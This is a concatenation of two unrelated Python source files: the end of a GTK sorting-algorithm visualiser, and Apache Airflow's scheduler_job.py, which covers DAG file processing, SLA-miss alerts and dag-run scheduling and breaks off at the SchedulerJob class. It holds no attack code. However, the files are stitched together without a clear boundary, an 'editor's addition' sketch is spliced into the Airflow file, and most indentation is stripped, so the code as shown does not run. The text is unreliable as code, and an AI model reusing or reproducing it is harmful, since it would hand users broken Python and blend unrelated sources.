self.barOrderToggle = self.builder.get_object("barOrderToggle")
self.rsSubrtToggle = self.builder.get_object("rsSubrtToggle")
self.mainDArea = self.builder.get_object("mainDArea")
self.barCountLbl = self.builder.get_object("barCountLbl")
self.changesMadeLbl = self.builder.get_object("changesMadeLbl")
self.barWidthSBtn.set_range(1, 200)
self.barWidthSBtn.set_value(9)
self.barWidthSBtn.set_increments(1, -1)
self.speedSBtn.set_range(10, 18000)
self.speedSBtn.set_value(60)
self.speedSBtn.set_increments(10, -10)
self.window.set_application(self)
self.window.show_all()
self.generate_heights()
self.rsSubrtToggle.hide()
self.builder.connect_signals(self.handlers)
def generate_heights(self):
global listToSort
listToSort = generate_list(self.mainDArea.get_allocation().height, round(self.mainDArea.get_allocation().width / (self.barWidthSBtn.get_value() + self.gapsToggle.get_active())), addl[6])
self.barCountLbl.set_label("Bars on screen: " + str(len(listToSort)))
self.prevSize = [self.mainDArea.get_allocation().width, self.mainDArea.get_allocation().height]
self.mainDArea.queue_draw()
def on_configure(self, widget, event):
wdiff = abs(self.mainDArea.get_allocation().width - self.prevSize[0])
hdiff = abs(self.mainDArea.get_allocation().height - self.prevSize[1])
margin = self.barWidthSBtn.get_value() + self.gapsToggle.get_active()
if ((wdiff >= margin) or (hdiff >= margin)) and not sortingThread.is_alive():
self.generate_heights()
def on_draw(self, widget, cairoContext):
nf = (not self.fillToggle.get_active())
bw = self.barWidthSBtn.get_value()
baseMargin = self.mainDArea.get_allocation().width / 2 - (len(listToSort) * (bw + self.gapsToggle.get_active())) / 2
cairoContext.set_source_rgb(0.6, 0.6, 0.6)
cairoContext.set_line_width(1)
cairoContext.set_antialias(1) # this stops one pixel wide bars from looking blurry
for i in range(len(listToSort)):
# left margin, top margin, width, height
cairoContext.rectangle(baseMargin + nf + (bw + self.gapsToggle.get_active()) * i, self.mainDArea.get_allocation().height - listToSort[i] + nf, bw - nf, listToSort[i] - nf)
cairoContext.fill() if self.fillToggle.get_active() else cairoContext.stroke()
self.changesMadeLbl.set_label("Changes made to list: " + str(addl[1]))
def on_tick(self, widget, frameClock, thread):
self.mainDArea.queue_draw()
return thread.is_alive()
def start_on_click(self, widget):
choice = algsSwitcher[self.algsCombo.get_active()]
arguments = (listToSort, addl)
if choice == quicksort:
arguments += (0, len(listToSort) - 1)
global sortingThread
if not sortingThread.is_alive():
addl[4] = 0
addl[2].clear()
sortingThread = threading.Thread(target = choice, args = arguments, daemon = True)
sortingThread.start()
self.window.add_tick_callback(self.on_tick, sortingThread)
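            # on_tick (defined above) returns sortingThread.is_alive(), so the
            # drawing area keeps being redrawn each frame until the sort finishes.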
def refr_on_click(self, widget):
addl[3] = True
addl[2].set()
addl[1] = 0
self.generate_heights()
self.mainDArea.queue_draw()
def algs_on_change(self, widget):
addl[3] = False
addl[2].set()
if widget == self.algsCombo:
if widget.get_active() == 3:
self.rsSubrtToggle.show()
else:
self.rsSubrtToggle.hide()
else:
if widget.get_active():
addl[5] = bubblesort
self.rsSubrtToggle.set_label("Subroutine: BS")
else:
addl[5] = countingsort
self.rsSubrtToggle.set_label("Subroutine: CS")
def on_setting_change(self, widget):
addl[0] = self.speedSBtn.get_value()
self.mainDArea.queue_draw()
if self.barOrderToggle.get_active():
addl[6] = True
self.barOrderToggle.set_label("Bars: descending")
else:
addl[6] = False
self.barOrderToggle.set_label("Bars: shuffled")
if self.barWidthSBtn.get_value() < 3:
self.fillToggle.set_active(True)
self.fillToggle.set_sensitive(False)
else:
self.fillToggle.set_sensitive(True)
if (widget == self.barWidthSBtn or widget == self.gapsToggle or widget == self.barOrderToggle) and not sortingThread.is_alive():
self.generate_heights()
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from typing import Dict, List, Optional, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import ExecutorLoader
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKeyType
from airflow.operators.dummy_operator import DummyOperator
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_id_white_list: Optional[List[str]],
failure_callback_requests: List[FailureCallbackRequest]
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_id_white_list = dag_id_white_list
self._failure_callback_requests = failure_callback_requests
        # The process that was launched to process the given file.
self._process = None
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
        # This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel = None
self._result_queue = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
failure_callback_requests):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
failure_callback_requests=failure_callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._failure_callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids, log):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
        Find all tasks that have SLAs defined and send alert emails
        where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis: # pylint: disable=too-many-nested-blocks
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n</code></pre>
            Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(self, dag, dag_runs=None, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if not dag.schedule_interval:
return None
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(f"{DagRunType.SCHEDULED.value}__%"))
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
        # don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=f"{DagRunType.SCHEDULED.value}__{next_run_date.isoformat()}",
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session=None
) -> List[TaskInstanceKeyType]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session=None):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
        :rtype: list[TaskInstanceKeyType]
        :return: A list of task instance keys that should be scheduled
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
use_job_schedule = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKeyType] = []
dag_ids = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id = {k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)}
for dag in dags:
dag_id = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag and use_job_schedule:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(self, dagbag, failure_callback_requests, session=None):
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
TI = models.TaskInstance
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
@provide_session
def process_file(
self, file_path, failure_callback_requests, pickle_dags=False, session=None
) -> Tuple[List[SimpleDag], int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
        :param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a tuple with list of SimpleDags made from the Dags found in the file and
count of import errors.
:rtype: Tuple[List[SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
try:
self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
except Exception: # pylint: disable=broad-except
self.log.exception("Error executing failure callback!")
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags = [dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids]
simple_dags = self._prepare_simple_dags(unpaused_dags, pickle_dags, session)
dags = self._find_dags_to_process(unpaused_dags)
ti_keys_to_schedule = self._process_dags(dags, session)
self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def _schedule_task_instances(
self,
dagbag: models.DagBag,
ti_keys_to_schedule: List[TaskInstanceKeyType],
session=None
) -> None:
"""
Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be scheduled and
        updates the information in the database.
:param dagbag: DagBag
:type dagbag: models.DagBag
        :param ti_keys_to_schedule: List of task instance keys which can be scheduled.
:type ti_keys_to_schedule: list
"""
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis: List[models.TaskInstance] = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_execute_callback \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
@provide_session
def _prepare_simple_dags(self, dags: List[DAG], pickle_dags: bool, session=None) -> List[SimpleDag]:
"""
        Convert DAGs to SimpleDags. If necessary, it also pickles the DAGs.
:param dags: List of DAGs
        :param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: List of SimpleDag
:rtype: List[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = []
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag in dags:
pickle_id = dag.pickle(session).id if pickle_dags else None
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
return simple_dags
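# --- Illustrative sketch (editor's addition, not part of Airflow) -------------
# create_dag_run above boils down to: take the last scheduled run, step forward
# by the schedule interval, clamp to the DAG's start_date/end_date, and only
# create a run once its whole period has elapsed. A minimal sketch of that
# decision for a plain timedelta schedule, assuming naive datetimes and ignoring
# catchup, cron expressions and task-level dates (all names below are
# hypothetical):
from datetime import datetime, timedelta
def sketch_next_run_date(last_run, interval, start_date, end_date, now):
    """Return the next execution date, or None if nothing should be scheduled."""
    # First run starts at start_date; later runs step forward by the interval.
    next_run = start_date if last_run is None else last_run + interval
    # Never schedule before the DAG's start_date or after its end_date.
    if next_run < start_date:
        next_run = start_date
    if end_date is not None and next_run > end_date:
        return None
    # The schedule period must have fully elapsed before the run is created.
    period_end = next_run + interval
    if period_end > now:
        return None
    return next_run
# e.g. sketch_next_run_date(None, timedelta(days=1), datetime(2020, 1, 1),
#                           None, datetime(2020, 1, 3)) -> datetime(2020, 1, 1)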
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
